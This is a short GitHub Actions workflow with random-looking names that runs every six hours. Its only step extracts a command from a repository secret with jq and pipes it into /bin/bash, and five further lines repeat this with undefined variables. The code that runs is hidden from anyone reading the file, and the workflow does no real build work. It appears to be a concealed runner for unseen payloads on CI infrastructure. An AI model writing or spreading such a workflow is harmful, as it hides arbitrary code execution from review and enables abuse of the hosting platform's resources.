name: wengtouwt

on:
  workflow_dispatch:
  schedule:
    - cron: '6 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: wengtouwt
        env:
          yjdik78: ${{ secrets.yjdik78 }}
        run: |
          echo $yjdik78 | jq -r .yo95 | /bin/bash
          echo $ng0693 | jq -r .vc6773 | /bin/bash
          echo $lth0 | jq -r .vi85 | /bin/bash
          echo $imk785 | jq -r .u4678 | /bin/bash
          echo $cxytd0756 | jq -r .sab4448 | /bin/bash
          echo $duvc22 | jq -r .lgt72595 | /bin/bash

